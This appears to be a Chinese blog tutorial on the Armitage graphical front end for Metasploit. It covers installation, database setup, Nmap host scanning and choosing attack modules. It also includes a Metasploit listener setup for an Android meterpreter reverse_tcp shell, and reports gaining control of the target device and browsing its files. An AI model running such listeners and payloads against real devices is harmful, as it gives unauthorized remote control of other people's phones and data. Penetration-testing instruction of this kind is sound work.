Armitage是一款基于Java的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式使用Metasploit难度较高,需要记忆的命令过多,而Armitage完美的解决了这一问题,用户只需要简单的点击菜单,就可以实现对目标主机的安全测试和攻击。Armitage良好的图形展示界面,使得攻击过程更加直观,用户体验更好。因其操作的简单性,尤其适合Metasploit初学者对目标系统进行安全测试和攻击。

Armitage

Armitage安装

Armitage的安装很简单,我们只需要执行下面命令即可。

apt-get update
apt-get install -y armitage

运行Armitage

首先初始化msf数据库,执行命令

msfdb init


然后执行命令armitage启动程序。

登录后界面如下

主机扫描

依次点击Hosts->Nmap Scan这里扫描方式有多种,都是基于nmap完成扫描的。当然也可以利用msf进行扫描。

如上,我们扫描到了此设备,点击设备右键可选择针对此设备的攻击模块。

相关shell操作

这里我们以android shell为列
首先在kali中生成基于android的shell
然后配置终端

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.50.123
set LPORT 443
exploit -j

运行shell后,成功获得权限

可视化的文件管理

总结

armitage将msf命令和结果通过图形化的形式展现出来。方便我们对文件的预览上传和下载。当然也有其缺点,必要msfdb数据库的配置就显得很鸡肋。

Kali黑客笔记一键关注
Last modification:June 11, 2022
正在沿街乞讨中……